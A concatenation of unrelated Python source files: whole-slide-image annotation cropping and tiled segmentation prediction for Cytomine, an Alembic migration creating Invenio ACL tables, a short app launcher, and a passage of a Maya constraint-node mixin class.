def width(self):
return self.image.shape[1]
@property
def channels(self):
return self.image.shape[-1]
@property
def np_image(self):
if self.image.ndim == 0:
raise ValueError("image empty '{}'".format(self._filepath))
return self.image
def powdiv(v, p):
return v / (2 ** p)
def convert_poly(p, zoom, im_height):
"""Move a polygon to the correct zoom level and referential"""
polygon = affine_transform(p, [powdiv(1, zoom), 0, 0, powdiv(1, zoom), 0, 0])
return affine_transform(polygon, [1, 0, 0, -1, 0, im_height])
class BaseAnnotationCrop(object):
@abstractmethod
def random_crop_and_mask(self):
pass
@abstractmethod
def crop_and_mask(self):
pass
class AnnotationCrop(BaseAnnotationCrop):
def __init__(self, wsi, annotation, working_path, tile_size=512, zoom_level=0, n_jobs=0, intersecting=None):
self._annotation = annotation
self._tile_size = tile_size
self._wsi = CytomineSlide(wsi, zoom_level=zoom_level)
self._builder = CytomineTileBuilder(working_path, n_jobs=n_jobs)
self._working_path = working_path
self._zoom_level = zoom_level
self._other_annotations = [] if intersecting is None else intersecting
self._other_polygons = [self._annot2poly(a) for a in self._other_annotations]
@property
def tile_size(self):
return self._tile_size
@property
def wsi(self):
return self._wsi
@property
def image_instance(self):
return self._wsi.image_instance
@property
def annotation(self):
return self._annotation
@property
def polygon(self):
return self._polygon()
@property
def image_box(self):
return self._extract_image_box()
def _get_start_and_size_over_dimension(self, crop_start, crop_size, wsi_size):
start = crop_start
size = crop_size
if crop_size < self._tile_size:
start = crop_start + (crop_size - self._tile_size) // 2
size = self._tile_size
# make sure that the tile is in the image
start = max(0, start)
start = min(start, wsi_size - size)
if start < 0:
raise ValueError("image is smaller than the tile size")
return start, size
def _extract_image_box(self):
crop_width, crop_height = self._crop_dims()
crop_x_min, crop_y_min, crop_x_max, crop_y_max = self._crop_bounds()
image_x_min, image_width = self._get_start_and_size_over_dimension(crop_x_min, crop_width, self._wsi.width)
image_y_min, image_height = self._get_start_and_size_over_dimension(crop_y_min, crop_height, self._wsi.height)
return (image_x_min, image_y_min), image_width, image_height
def _get_image_filepath(self):
(x, y), width, height = self._extract_image_box()
return os.path.join(self._working_path, "{}-{}-{}-{}-{}-{}.png".format(self._zoom_level, self.image_instance.id, x, y, width, height))
def _download_image(self):
filepath = self._get_image_filepath()
if not os.path.isfile(filepath):
(x, y), width, height = self._extract_image_box()
tile = self._wsi.tile(self._builder, (x, y), width, height)
image = PIL.Image.fromarray(tile.np_image)
image.save(filepath)
return filepath
def download(self, verbose=False):
if verbose:
print("download '{}'".format(self._get_image_filepath()))
return self._download_image()
def _polygon(self):
return self._annot2poly(self._annotation)
def _annot2poly(self, annot):
polygon = wkt.loads(annot.location)
return convert_poly(polygon, self._zoom_level, self.wsi.height)
def _crop_bounds(self):
"""at the specified zoom level"""
x_min, y_min, x_max, y_max = self._polygon().bounds
return int(x_min), int(y_min), math.ceil(x_max), math.ceil(y_max)
def _crop_dims(self):
x_min, y_min, x_max, y_max = self._crop_bounds()
return x_max - x_min, y_max - y_min
def _robust_load_crop(self, x, y):
attempts = 0
filepath = self._get_image_filepath()
while True:
try:
return Image.open(filepath).crop([x, y, x + self._tile_size, y + self._tile_size])
except OSError as e:
attempts += 1
if attempts > 3:
raise e
print("recreate '{}'".format(filepath))
os.remove(filepath)
self.download()
def _robust_load_image(self):
attempts = 0
filepath = self._get_image_filepath()
while True:
try:
return Image.open(filepath)
except OSError as e:
attempts += 1
if attempts > 3:
raise e
print("recreate '{}'".format(filepath))
os.remove(filepath)
self.download()
def random_crop_and_mask(self):
"""in image coordinate system"""
(x_min, y_min), width, height = self._extract_image_box()
x = np.random.randint(0, width - self._tile_size + 1)
y = np.random.randint(0, height - self._tile_size + 1)
crop = self._robust_load_crop(x, y)
mask = self._mask(x, y, self._tile_size, self._tile_size)
return (x, y, self._tile_size, self._tile_size), crop, Image.fromarray(mask.astype(np.uint8))
def crop_and_mask(self):
"""in image coordinates system, get full crop and mask"""
_, width, height = self._extract_image_box()
image = self._robust_load_image()
mask = self._mask(0, 0, width, height)
return image, Image.fromarray(mask.astype(np.uint8))
def _mask(self, window_x, window_y, window_width, window_height):
(crop_x, crop_y), crop_width, crop_height = self.image_box
ground_truth = [self._polygon()] + self._other_polygons
window = box(0, 0, window_width, window_height)
fg = [translate(g, xoff=-(window_x + crop_x), yoff=-(window_y + crop_y)).intersection(window)
for g in ground_truth]
fg = [p for p in fg if not p.is_empty]
if len(fg) > 0:
mask = rasterize(fg, out_shape=(window_height, window_width), fill=0, dtype=np.uint8) * 255
else:
mask = np.zeros([window_height, window_width])
return mask
@property
def intersecting(self):
return self._other_annotations
@property
def sldc_image(self):
return PilImage(self._get_image_filepath())
@property
def sldc_window(self):
xmin, ymin, _, _ = self._crop_bounds()
width, height = self._crop_dims()
return self._wsi.window((xmin, ymin), width, height)
def topology(self, width, height, overlap=0):
base_topology = TileTopology(self.sldc_image, tile_builder=self.tile_builder, max_width=width, max_height=height, overlap=overlap)
return FixedSizeTileTopology(base_topology)
@property
def tile_builder(self):
return DefaultTileBuilder()
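# Usage sketch for AnnotationCrop (hedged): `wsi_instance` and `annot` are placeholders
# for a Cytomine image instance and Annotation fetched elsewhere; only methods defined
# above are used.
#
#   crop = AnnotationCrop(wsi_instance, annot, working_path="/tmp/crops", tile_size=512, zoom_level=2)
#   crop.download(verbose=True)                                # caches the crop image locally
#   (x, y, w, h), tile, mask = crop.random_crop_and_mask()     # PIL tile + binary PIL mask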
class AnnotationCropWithCue(BaseAnnotationCrop):
def __init__(self, crop: BaseAnnotationCrop, cue):
"""
Parameters
----------
crop: BaseAnnotationCrop
cue: ndarray
Probability map for the cue np.array of float in [0, 1]
"""
self._crop = crop
self._cue = (cue * 255)
def random_crop_and_mask(self):
crop_location, crop, mask = self._crop.random_crop_and_mask()
x, y, w, h = crop_location
final_mask = self._cue[y:(y+h), x:(x+w)]
final_mask[np.asarray(mask) > 0] = 255
return crop_location, crop, Image.fromarray(final_mask.astype(np.uint8), "L")
def crop_and_mask(self):
crop, mask = self._crop.crop_and_mask()
final_mask = self._cue
final_mask[np.asarray(mask) > 0] = 255
return crop, Image.fromarray(final_mask)
@property
def cue(self):
return self._cue
@property
def crop(self):
return self._crop
class RemoteAnnotationCropTrainDataset(Dataset):
def __init__(self, crops, image_trans=None, both_trans=None, mask_trans=None):
self._crops = crops
self._both_trans = both_trans
self._image_trans = image_trans
self._mask_trans = mask_trans
def __getitem__(self, item):
annotation_crop = self._crops[item]
_, image, mask = annotation_crop.random_crop_and_mask()
if self._both_trans is not None:
image, mask = self._both_trans([image, mask])
if self._image_trans is not None:
image = self._image_trans(image)
if self._mask_trans is not None:
mask = self._mask_trans(mask)
return image, mask
def __len__(self):
return len(self._crops)
class TileTopologyDataset(Dataset):
def __init__(self, topology, trans=None):
self._topology = topology
self._trans = trans
@property
def topology(self):
return self._topology
@property
def trans(self):
return self._trans
def __getitem__(self, item):
image = Image.fromarray(self._topology.tile(item + 1).np_image)
if self._trans is not None:
image = self._trans(image)
return item + 1, image
def __len__(self):
return len(self._topology)
def predict_roi(roi, ground_truth, model, device, in_trans=None, batch_size=1, tile_size=256, overlap=0, n_jobs=1, zoom_level=0):
"""
Parameters
----------
roi: AnnotationCrop
The polygon representing the roi to process
ground_truth: iterable of Annotation|Polygon
The ground truth annotations
model: nn.Module
Segmentation network. Takes a batch of images as input and outputs the foreground probability for all pixels
device:
A torch device to transfer data to
in_trans: transforms.Transform
A transform to apply before forwarding images into the network
batch_size: int
Batch size
tile_size: int
Tile size
overlap: int
Tile tile_overlap
n_jobs: int
Number of jobs available
zoom_level: int
Zoom level
Returns
-------
y_pred: ndarray
Per-pixel foreground probability map for the roi window
y_true: ndarray
Rasterized ground truth mask for the roi window
"""
# topology
tile_topology = roi.topology(width=tile_size, height=tile_size, overlap=overlap)
(x_min, y_min), width, height = roi.image_box
mask_dims = (height, width)
# build ground truth
roi_poly = roi.polygon
ground_truth = [(wkt.loads(g.location) if isinstance(g, Annotation) else g) for g in ground_truth]
ground_truth = [convert_poly(g, zoom_level, roi.wsi.height) for g in ground_truth]
translated_gt = [translate(g.intersection(roi_poly), xoff=-x_min, yoff=-y_min) for g in ground_truth]
y_true = rasterize(translated_gt, out_shape=mask_dims, fill=0, dtype=np.uint8)
y_pred = np.zeros(y_true.shape, dtype=np.double)
y_acc = np.zeros(y_true.shape, dtype=int)
# dataset and loader
dataset = TileTopologyDataset(tile_topology, trans=in_trans)
dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=n_jobs)
for ids, x in dataloader:
x = x.to(device)
y = model.forward(x, sigmoid=True)
# accumulate predictions
for i, identifier in enumerate(ids):
x_off, y_off = tile_topology.tile_offset(identifier.item())
y_pred[y_off:(y_off + tile_size), x_off:(x_off + tile_size)] += y[i].detach().cpu().squeeze().numpy()
y_acc[y_off:(y_off + tile_size), x_off:(x_off + tile_size)] += 1
# average multiple predictions
y_pred /= y_acc
# import cv2
# from datetime import datetime
# roi.annotation.dump("{}_image.png".format(roi.annotation.id), override=False)
# cv2.imwrite("{}_true.png".format(roi.annotation.id), y_true * 255)
# cv2.imwrite("{}_pred_{}.png".format(roi.annotation.id, datetime.now().timestamp()), (y_pred * 255).astype(np.uint8))
return y_pred, y_true
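# Usage sketch for predict_roi (hedged): `net`, `roi_crop` and `gt_annotations` are
# hypothetical placeholders for a segmentation network, an AnnotationCrop and its
# ground-truth annotations created elsewhere.
#
#   device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
#   y_pred, y_true = predict_roi(roi_crop, gt_annotations, net, device,
#                                in_trans=transforms.ToTensor(), batch_size=4,
#                                tile_size=256, overlap=0, n_jobs=2, zoom_level=0)
#   # y_pred: per-pixel foreground probabilities, y_true: rasterized ground truth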
def datasets_size_cumsum(datasets):
sizes = np.array([len(d) for d in datasets])
cumsum = np.concatenate([np.array([0]), np.cumsum(sizes[:-1], dtype=int)])
return sizes, cumsum
def get_sample_indexes(index, cumsum):
dataset_index = np.searchsorted(cumsum, index, side="right") - 1
relative_index = index - cumsum[dataset_index]
return dataset_index, relative_index
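# Worked example: for datasets of sizes [5, 7, 3], datasets_size_cumsum gives
# sizes=[5, 7, 3] and cumsum=[0, 5, 12]; a global index of 7 then resolves to
# get_sample_indexes(7, cumsum) == (1, 2), i.e. item 2 of the second dataset.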
class AnnotationCropTopoplogyDataset(Dataset):
def __init__(self, crop, overlap=0, in_trans=None):
self._dataset = TileTopologyDataset(crop.topology(crop.tile_size, crop.tile_size, overlap=overlap), trans=in_trans)
self._crop = crop
def __getitem__(self, item):
_id, tile = self._dataset[item]
x_off, y_off = self._dataset.topology.tile_offset(_id)
return _id, x_off, y_off, tile
def __len__(self):
return len(self._dataset)
class MultiCropsSet(Dataset):
def __init__(self, crops, in_trans, overlap=0):
"""
Parameters
----------
do_add_group: bool
True to append group identifier (optional), default: `False`.
kwargs: dict
Parameters to be transferred to the actual `ImageFolder`.
"""
super().__init__()
self._datasets = [
AnnotationCropTopoplogyDataset(crop, overlap=overlap, in_trans=in_trans)
for crop in crops]
self._sizes, self._cumsum_sizes = datasets_size_cumsum(self._datasets)
def __getitem__(self, index):
dataset_index, relative_index = get_sample_indexes(index, self._cumsum_sizes)
dataset = self._datasets[dataset_index]
return (dataset._crop.annotation.id,) + dataset[relative_index]
def __len__(self):
return self._cumsum_sizes[-1] + len(self._datasets[-1])
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
def predict_annotation_crops_with_cues(net, crops, device, in_trans=None, overlap=0, batch_size=8, n_jobs=1):
if len(crops) == 0:
return []
dataset = MultiCropsSet(crops, in_trans=in_trans, overlap=overlap)
loader = DataLoader(dataset, batch_size=batch_size, shuffle=False,
num_workers=n_jobs, pin_memory=True, drop_last=False)
tile_size = crops[0].tile_size
n_bytes = len(dataset) * tile_size * tile_size * 4
print("> annot with cues needs approx {} of memory".format(sizeof_fmt(n_bytes)), flush=True)
all_ys = defaultdict(list)
net.eval()
for annot_ids, tile_ids, xs, ys, tiles in loader:
t = tiles.to(device)
y = torch.sigmoid(net.forward(t))
detached = y.detach().cpu().numpy()
for i, (annot_id, tile_id, x_off, y_off) in enumerate(zip(annot_ids, tile_ids, xs, ys)):
all_ys[annot_id.item()].append((tile_id.item(), (x_off.item(), y_off.item()), detached[i].squeeze()))
awcues = list()
for crop in crops:
_, w, h = crop.image_box
cue = np.zeros([h, w], dtype=float)
acc = np.zeros([h, w], dtype=int)
for tile_id, (x_off, y_off), y_pred in all_ys[crop.annotation.id]:
cue[y_off:(y_off + tile_size), x_off:(x_off + tile_size)] += y_pred
acc[y_off:(y_off + tile_size), x_off:(x_off + tile_size)] += 1
cue /= acc
awcues.append(AnnotationCropWithCue(crop, cue=cue))
del(all_ys[crop.annotation.id])
return awcues
|
python
|
#
# Copyright (c) 2019 UCT Prague.
#
# ec5cbec43ec8_initial_layout.py is part of Invenio Explicit ACLs
# (see https://github.com/oarepo/invenio-explicit-acls).
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""Initial layout."""
import sqlalchemy as sa
from alembic import op
try:
from psycopg2 import apilevel
from sqlalchemy.dialects.postgresql import JSONB as JSON
from sqlalchemy.dialects.postgresql import ARRAY
from invenio_explicit_acls.utils import ArrayType as FallbackArrayType
fallback_StringArray = FallbackArrayType(sa.String())
StringArray = ARRAY(sa.String).with_variant(fallback_StringArray, 'sqlite')
except ImportError:
from sqlalchemy.types import JSON
from invenio_explicit_acls.utils import ArrayType as ARRAY
StringArray = ARRAY(sa.String())
# revision identifiers, used by Alembic.
revision = 'ec5cbec43ec8'
down_revision = None
branch_labels = ('invenio_explicit_acls',)
depends_on = None
def upgrade():
"""Upgrade database."""
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('explicit_acls_acl',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=False),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('priority', sa.Integer(), nullable=True),
sa.Column('schemas', StringArray, nullable=True),
sa.Column('originator_id', sa.Integer(), nullable=False),
sa.Column('type', sa.String(length=50), nullable=True),
sa.Column('operation', sa.String(length=50), nullable=True),
sa.ForeignKeyConstraint(['originator_id'], ['accounts_user.id'], name=op.f('fk_explicit_acls_acl_originator_id_accounts_user'), ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_acl'))
)
op.create_index(op.f('ix_explicit_acls_acl_originator_id'), 'explicit_acls_acl', ['originator_id'], unique=False)
op.create_table('explicit_acls_actor',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('type', sa.String(length=50), nullable=True),
sa.Column('acl_id', sa.String(length=36), nullable=True),
sa.ForeignKeyConstraint(['acl_id'], ['explicit_acls_acl.id'], name=op.f('fk_explicit_acls_actor_acl_id_explicit_acls_acl')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_actor'))
)
op.create_table('explicit_acls_defaultacl',
sa.Column('id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_acl.id'], name=op.f('fk_explicit_acls_defaultacl_id_explicit_acls_acl')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_defaultacl'))
)
op.create_table('explicit_acls_elasticsearchacl',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('record_selector', JSON(astext_type=sa.Text()), nullable=True),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_acl.id'], name=op.f('fk_explicit_acls_elasticsearchacl_id_explicit_acls_acl')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_elasticsearchacl'))
)
op.create_table('explicit_acls_idacl',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('record_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_acl.id'], name=op.f('fk_explicit_acls_idacl_id_explicit_acls_acl')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_idacl'))
)
op.create_table('explicit_acls_system_role',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('authenticated', sa.Boolean(), nullable=True),
sa.Column('anonymous', sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_actor.id'], name=op.f('fk_explicit_acls_system_role_id_explicit_acls_actor')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_system_role'))
)
op.create_table('explicit_acls_roleactor',
sa.Column('id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_actor.id'], name=op.f('fk_explicit_acls_roleactor_id_explicit_acls_actor')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_roleactor'))
)
op.create_table('explicit_acls_useractor',
sa.Column('id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_actor.id'], name=op.f('fk_explicit_acls_useractor_id_explicit_acls_actor')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_useractor'))
)
op.create_table('explicit_acls_roles_roleactors',
sa.Column('role_id', sa.Integer(), nullable=False),
sa.Column('actor_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['actor_id'], ['explicit_acls_roleactor.id'], name=op.f('fk_explicit_acls_roles_roleactors_actor_id_explicit_acls_roleactor')),
sa.ForeignKeyConstraint(['role_id'], ['accounts_role.id'], name=op.f('fk_explicit_acls_roles_roleactors_role_id_accounts_role')),
sa.PrimaryKeyConstraint('role_id', 'actor_id', name=op.f('pk_explicit_acls_roles_roleactors'))
)
op.create_table('explicit_acls_users_useractors',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('actor_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['actor_id'], ['explicit_acls_useractor.id'], name=op.f('fk_explicit_acls_users_useractors_actor_id_explicit_acls_useractor')),
sa.ForeignKeyConstraint(['user_id'], ['accounts_user.id'], name=op.f('fk_explicit_acls_users_useractors_user_id_accounts_user')),
sa.PrimaryKeyConstraint('user_id', 'actor_id', name=op.f('pk_explicit_acls_users_useractors'))
)
# ### end Alembic commands ###
def downgrade():
"""Downgrade database."""
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('explicit_acls_users_useractors')
op.drop_table('explicit_acls_roles_roleactors')
op.drop_table('explicit_acls_useractor')
op.drop_table('explicit_acls_roleactor')
op.drop_table('explicit_acls_system_role')
op.drop_table('explicit_acls_idacl')
op.drop_table('explicit_acls_elasticsearchacl')
op.drop_table('explicit_acls_defaultacl')
op.drop_table('explicit_acls_actor')
op.drop_index(op.f('ix_explicit_acls_acl_originator_id'), table_name='explicit_acls_acl')
op.drop_table('explicit_acls_acl')
# ### end Alembic commands ###
|
python
|
from language_learner_env import secret_settings
import learner
app = learner.App(secret_settings)
app.listen()
|
python
|
from maya import cmds as mc
from maya.api import OpenMaya as om
from dcc.maya.libs import transformutils
from . import transformmixin
import logging
logging.basicConfig()
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
class ConstraintMixin(transformmixin.TransformMixin):
"""
Overload of TransformMixin class used to interface with constraint nodes.
"""
__apitype__ = (om.MFn.kConstraint, om.MFn.kPluginConstraintNode)
__targets__ = {
'translateX': 'targetTranslateX',
'translateY': 'targetTranslateY',
'translateZ': 'targetTranslateZ',
'rotatePivotX': 'targetRotatePivotX',
'rotatePivotY': 'targetRotatePivotY',
'rotatePivotZ': 'targetRotatePivotZ',
'rotatePivotTranslateX': 'targetRotateTranslateX',
'rotatePivotTranslateY': 'targetRotateTranslateY',
'rotatePivotTranslateZ': 'targetRotateTranslateZ',
'scalePivotX': 'targetScalePivotX',
'scalePivotY': 'targetScalePivotY',
'scalePivotZ': 'targetScalePivotZ',
'scalePivotTranslateX': 'targetScaleTranslateX',
'scalePivotTranslateY': 'targetScaleTranslateY',
'scalePivotTranslateZ': 'targetScaleTranslateZ',
'rotateX': 'targetRotateX',
'rotateY': 'targetRotateY',
'rotateZ': 'targetRotateZ',
'rotateOrder': 'targetRotateOrder',
'jointOrientX': 'targetJointOrientX',
'jointOrientY': 'targetJointOrientY',
'jointOrientZ': 'targetJointOrientZ',
'scaleX': 'targetScaleX',
'scaleY': 'targetScaleY',
'scaleZ': 'targetScaleZ',
'inverseScale': 'targetInverseScale',
'segmentScaleCompensate': 'targetScaleCompensate'
}
__outputs__ = {
'constraintTranslateX': 'translateX',
'constraintTranslateY': 'translateY',
'constraintTranslateZ': 'translateZ',
'constraintRotateX': 'rotateX',
'constraintRotateY': 'rotateY',
'constraintRotateZ': 'rotateZ',
'constraintScaleX': 'scaleX',
'constraintScaleY': 'scaleY',
'constraintScaleZ': 'scaleZ'
}
def __init__(self, *args, **kwargs):
"""
Private method called after a new instance has been created.
"""
# Call parent method
#
super(ConstraintMixin, self).__init__(*args, **kwargs)
def constraintObject(self):
"""
Returns the object being driven by this constraint node.
The constraint parent inverse matrix plug is usually the common denominator in all constraint nodes.
It should be fairly safe to query the connection to find this object.
:rtype: mpynode.MPyNode
"""
# Check if plug has a connection
#
plug = self.findPlug('constraintParentInverseMatrix')
source = plug.source()
if not source.isNull:
return self.pyFactory(source.node())
else:
return None
def setConstraintObject(self, constraintObject, **kwargs):
"""
Updates the constraint object for this instance.
:type constraintObject: mpy.mpynode.MPyNode
:key maintainOffset: bool
:key skipTranslateX: bool
:key skipTranslateY: bool
:key skipTranslateZ: bool
:key skipRotateX: bool
:key skipRotateY: bool
:key skipRotateZ: bool
:key skipScaleX: bool
:key skipScaleY: bool
:key skipScaleZ: bool
:rtype: None
"""
# Check for redundancy
#
if constraintObject == self.constraintObject():
return
# Re-parent this constraint
#
self.setParent(constraintObject)
# Update constraint name
#
constraintName = '{nodeName}_{typeName}1'.format(nodeName=constraintObject.displayName(), typeName=self.typeName)
self.setName(constraintName)
# Update rest matrix
#
restMatrix = constraintObject.getAttr('matrix')
self.setRestMatrix(restMatrix)
# Connect output attributes
#
for (sourceName, destinationName) in self.__outputs__.items():
# Check if attribute should be skipped
#
attributeName = destinationName[0].upper() + destinationName[1:]
key = 'skip{attributeName}'.format(attributeName=attributeName)
skipAttribute = kwargs.get(key, False)
if skipAttribute:
log.info('Skipping constraint attribute: %s' % destinationName)
continue
# Check if attributes exist
#
if not self.hasAttr(sourceName) or not constraintObject.hasAttr(destinationName):
log.info('Unable to locate constraint attributes: %s and %s' % (sourceName, destinationName))
continue
# Get associated plugs
#
source = self.findPlug(sourceName)
destination = constraintObject.findPlug(destinationName)
# Connect plugs
#
self.breakConnections(source, source=False, destination=True)
self.connectPlugs(source, destination, force=True)
# Update constraint parent inverse matrix
#
source = constraintObject.findPlug('parentInverseMatrix[%s]' % constraintObject.instanceNumber())
destination = self.findPlug('constraintParentInverseMatrix')
constraintObject.connectPlugs(source, destination, force=True)
# Check if constraint supports rotation order
# This is only seen in orient and transform constraints
#
if self.hasAttr('constraintRotateOrder'):
constraintObject.connectPlugs('rotateOrder', self.findPlug('constraintRotateOrder'), force=True)
# Check if constraint supports joint orient
# This is only seen in orient and transform constraints
#
if self.hasAttr('constraintJointOrient') and constraintObject.hasAttr('jointOrient'):
# Connect child plugs
#
source = constraintObject.findPlug('jointOrient')
destination = self.findPlug('constraintJointOrient')
for i in range(source.numChildren()):
constraintObject.connectPlugs(source.child(i), destination.child(i), force=True)
def interpolationType(self):
"""
Getter method used to retrieve the interpolation type for this constraint.
:rtype: int
"""
return om.MPlug(self.object(), self.attribute('interpType')).asInt()
def setInterpolationType(self, interpolationType):
"""
Setter method used to update the interpolation type for this constraint.
:type interpolationType: int
:rtype: None
"""
om.MPlug(self.object(), self.attribute('interpType')).setInt(interpolationType)
def offset(self):
"""
Getter method used to retrieve the offset for this constraint.
Only a few constraints support this method such as point and orient constraints!
:rtype: om.MVector
"""
return om.MVector(
om.MPlug(self.object(), self.attribute('offsetX')).asFloat(),
om.MPlug(self.object(), self.attribute('offsetY')).asFloat(),
om.MPlug(self.object(), self.attribute('offsetZ')).asFloat()
)
def setOffset(self, offset):
"""
Setter method used to update the offset for this constraint.
Only a few constraints support this method such as point and orient constraints!
:type offset: om.MVector
:rtype: None
"""
om.MPlug(self.object(), self.attribute('offsetX')).setFloat(offset.x)
om.MPlug(self.object(), self.attribute('offsetY')).setFloat(offset.y)
om.MPlug(self.object(), self.attribute('offsetZ')).setFloat(offset.z)
def targets(self):
"""
Collects all of the available constraint targets.
:rtype: list[ConstraintTarget]
"""
return list(self.iterTargets())
def targetObjects(self):
"""
Retrieves the target objects driving this constraint.
:rtype: list[mpynode.MPyNode]
"""
return [x.targetObject() for x in self.iterTargets()]
def iterTargets(self):
"""
Generator method used to iterate through all available constraint targets.
:rtype: iter
"""
# Iterate through target indices
#
for i in range(self.targetCount()):
yield ConstraintTarget(self, index=i)
def targetCount(self):
"""
Evaluates the number of active target elements available.
:rtype: int
"""
return om.MPlug(self.object(), self.attribute('target')).evaluateNumElements()
def addTarget(self, target, maintainOffset=True):
"""
Adds a new target to this constraint.
:type target: mpynode.MPyNode
:type maintainOffset: bool
:rtype: int
"""
# Iterate through required target attributes
#
plug = self.findPlug('target')
index = plug.evaluateNumElements()
for (sourceName, destinationName) in self.__targets__.items():
# Check if constraint has attribute
#
if not target.hasAttr(sourceName) or not self.hasAttr(destinationName):
log.info('Unable to locate constraint attributes: %s and %s' % (sourceName, destinationName))
continue
# Connect plugs
#
source = target.findPlug(sourceName)
destination = self.findPlug('target[%s].%s' % (index, destinationName))
self.connectPlugs(source, destination)
# Connect parent matrix attribute
#
source = target.findPlug('parentMatrix[%s]' % target.instanceNumber())
destination = self.findPlug('target[%s].targetParentMatrix' % index)
self.connectPlugs(source, destination)
# Connect weight attributes
#
nodeName = target.displayName()
attribute = self.addAttr(
longName='{nodeName}W{index}'.format(nodeName=nodeName, index=index),
attributeType='float',
min=0.0, max=1.0
)
source = om.MPlug(self.object(), attribute)
destination = self.findPlug('target[%s].targetWeight' % index)
self.connectPlugs(source, destination)
# Enable weight attribute
#
source.setFloat(1.0)
# Return new target index
#
return index
def addTargets(self, targets, maintainOffset=False):
"""
Adds a list of new targets to this constraint.
:type targets: list[mpynode.MPyNode]
:type maintainOffset: bool
:rtype: int
"""
for target in targets:
self.addTarget(target, maintainOffset=maintainOffset)
def removeTarget(self, index):
pass
def restTranslate(self, context=om.MDGContext.kNormal):
"""
Returns the rest translate component from this constraint.
This value is used when there are no target weights.
:type context: om.MDGContext
:rtype: om.MVector
"""
return om.MVector(
self.findPlug('restTranslateX').asFloat(context=context),
self.findPlug('restTranslateY').asFloat(context=context),
self.findPlug('restTranslateZ').asFloat(context=context)
)
def setRestTranslate(self, restTranslate):
"""
Updates the rest translate for this constraint.
:type restTranslate: om.MVector
:rtype: None
"""
# Assign translation to plug
#
self.findPlug('restTranslateX').setFloat(restTranslate.x)
self.findPlug('restTranslateY').setFloat(restTranslate.y)
self.findPlug('restTranslateZ').setFloat(restTranslate.z)
def restRotate(self, context=om.MDGContext.kNormal):
"""
Returns the rest rotation component from this constraint.
This value is used when there are no target weights.
:type context: om.MDGContext
:rtype: om.MEulerRotation
"""
return om.MEulerRotation(
self.findPlug('restRotateX').asFloat(context=context),
self.findPlug('restRotateY').asFloat(context=context),
self.findPlug('restRotateZ').asFloat(context=context),
order=self.rotateOrder(context=context)
)
def setRestRotate(self, restRotation):
"""
Updates the rest rotate for this constraint.
:type restRotation: om.MEulerRotation
:rtype: None
"""
# Check if rotation needs reordering
#
rotateOrder = self.rotateOrder()
if restRotation.order != rotateOrder:
restRotation = restRotation.reorder(rotateOrder)
# Assign rotation to plugs
#
self.findPlug('restRotateX').setFloat(restRotation.x)
self.findPlug('restRotateY').setFloat(restRotation.y)
self.findPlug('restRotateZ').setFloat(restRotation.z)
def restScale(self, context=om.MDGContext.kNormal):
"""
Returns the rest translate component from this constraint.
This value is used when there are no target weights.
:type context: om.MDGContext
:rtype: list[float, float, float]
"""
return [
self.findPlug('restScaleX').asFloat(context=context),
self.findPlug('restScaleY').asFloat(context=context),
self.findPlug('restScaleZ').asFloat(context=context)
]
def setRestScale(self, restScale):
"""
Updates the rest translate for this constraint.
:type restScale: list[float, float, float]
:rtype: None
"""
# Assign scale to plugs
#
self.findPlug('restScaleX').setFloat(restScale[0])
self.findPlug('restScaleY').setFloat(restScale[1])
self.findPlug('restScaleZ').setFloat(restScale[2])
def restMatrix(self):
"""
Computes a transform matrix based off the rest components.
:rtype: om.MMatrix
"""
# Compose rest matrix
#
translateMatrix = transformutils.createTranslateMatrix(self.restTranslate())
rotateMatrix = transformutils.createRotationMatrix(self.restRotate())
scaleMatrix = transformutils.createScaleMatrix(1.0)
